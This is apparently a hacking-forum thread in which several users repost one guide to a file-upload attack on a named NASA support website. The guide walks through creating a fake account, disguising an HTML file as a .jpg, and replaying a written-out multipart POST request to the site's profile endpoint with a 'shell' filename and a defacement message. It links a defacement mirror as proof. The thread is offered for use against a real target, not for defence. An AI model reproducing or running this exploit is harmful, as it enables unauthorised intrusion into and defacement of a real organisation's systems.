NASA Support Submit Upload Exploit (2 Viewers)

Joined
Jul 6, 2018
Credits
0
Rating - 0%
NASA Submit Upload Exploit
Founder : God3err
1) Open site https://support.earthdata.nasa.gov/
View hidden content is available for registered users!

2) Create fake account
3) Install Live HTTP Headers and HTTP Requester
4) Open Live HTTP Header and rename index.html.jpg
5) Upload this file
6) Copy POST Request
7) Paste HTTP Requester and POST :))

POST https://support.earthdata.nasa.gov/index.php?/Base/UserAccount/ProfileSubmit

-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="salutation"\r\n
\r\n 0\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="fullname"\r\n
\r\n asfsafa safsafs\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userorganization"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userdesignation"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="phone"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="profileimage"; filename="shell.txt.jpg(EDIT)"\r\n
Content-Type: image/jpeg\r\n
\r\n
Exploited By God3err\r\n
NASA Shell Explo!t\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="sendemailtoall"\r\n \r\n 1\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="emaillist[]"\r\n \r\n ******@*****.com(EDIT)\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="_csrfhash"\r\n \r\n xca9fo1wjcsd4o3zwdtzlo5x3j3lio7v\r\n -----------------------------25505821327763--\r\n
Success
E.g
http://overflowzone.com/mirror/84863/
Video :
Website : god3err.pw
Orijinal Makale : https://cxsecurity.com/issue/WLB-2018080056
Orijinal makaleyi incelerseniz sevinirim :))

 
Last edited:
Joined
May 5, 2019
Credits
132
Rating - 0%
NASA Submit Upload Exploit
Founder : God3err
1) Open site
View hidden content is available for registered users!

2) Create fake account
3) Install Live HTTP Headers and HTTP Requester
4) Open Live HTTP Header and rename index.html.jpg
5) Upload this file
6) Copy POST Request
7) Paste HTTP Requester and POST :))

POST

-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="salutation"\r\n
\r\n 0\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="fullname"\r\n
\r\n asfsafa safsafs\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userorganization"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userdesignation"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="phone"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="profileimage"; filename="shell.txt.jpg(EDIT)"\r\n
Content-Type: image/jpeg\r\n
\r\n
Exploited By God3err\r\n
NASA Shell Explo!t\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="sendemailtoall"\r\n \r\n 1\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="emaillist[]"\r\n \r\n ******@*****.com(EDIT)\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="_csrfhash"\r\n \r\n xca9fo1wjcsd4o3zwdtzlo5x3j3lio7v\r\n -----------------------------25505821327763--\r\n
Success
E.g

Video :
Website : god3err.pw
Orijinal Makale :
Orijinal makaleyi incelerseniz sevinirim :))

bakak
 
Joined
Nov 2, 2019
Credits
0
Rating - 0%
NASA Submit Upload Exploit
Founder : God3err
1) Open site
View hidden content is available for registered users!

2) Create fake account
3) Install Live HTTP Headers and HTTP Requester
4) Open Live HTTP Header and rename index.html.jpg
5) Upload this file
6) Copy POST Request
7) Paste HTTP Requester and POST :))

POST

-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="salutation"\r\n
\r\n 0\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="fullname"\r\n
\r\n asfsafa safsafs\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userorganization"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userdesignation"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="phone"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="profileimage"; filename="shell.txt.jpg(EDIT)"\r\n
Content-Type: image/jpeg\r\n
\r\n
Exploited By God3err\r\n
NASA Shell Explo!t\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="sendemailtoall"\r\n \r\n 1\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="emaillist[]"\r\n \r\n ******@*****.com(EDIT)\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="_csrfhash"\r\n \r\n xca9fo1wjcsd4o3zwdtzlo5x3j3lio7v\r\n -----------------------------25505821327763--\r\n
Success
E.g

Video :
Website : god3err.pw
Orijinal Makale :
Orijinal makaleyi incelerseniz sevinirim :))

 

by.root

Defacer değil Lamer
Joined
Dec 29, 2018
Credits
0
Rating - 0%
NASA Submit Upload Exploit
Founder : God3err
1) Open site
View hidden content is available for registered users!

2) Create fake account
3) Install Live HTTP Headers and HTTP Requester
4) Open Live HTTP Header and rename index.html.jpg
5) Upload this file
6) Copy POST Request
7) Paste HTTP Requester and POST :))

POST

-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="salutation"\r\n
\r\n 0\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="fullname"\r\n
\r\n asfsafa safsafs\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userorganization"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userdesignation"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="phone"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="profileimage"; filename="shell.txt.jpg(EDIT)"\r\n
Content-Type: image/jpeg\r\n
\r\n
Exploited By God3err\r\n
NASA Shell Explo!t\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="sendemailtoall"\r\n \r\n 1\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="emaillist[]"\r\n \r\n ******@*****.com(EDIT)\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="_csrfhash"\r\n \r\n xca9fo1wjcsd4o3zwdtzlo5x3j3lio7v\r\n -----------------------------25505821327763--\r\n
Success
E.g

Video :
Website : god3err.pw
Orijinal Makale :
Orijinal makaleyi incelerseniz sevinirim :))

 

Users who are viewing this thread

Top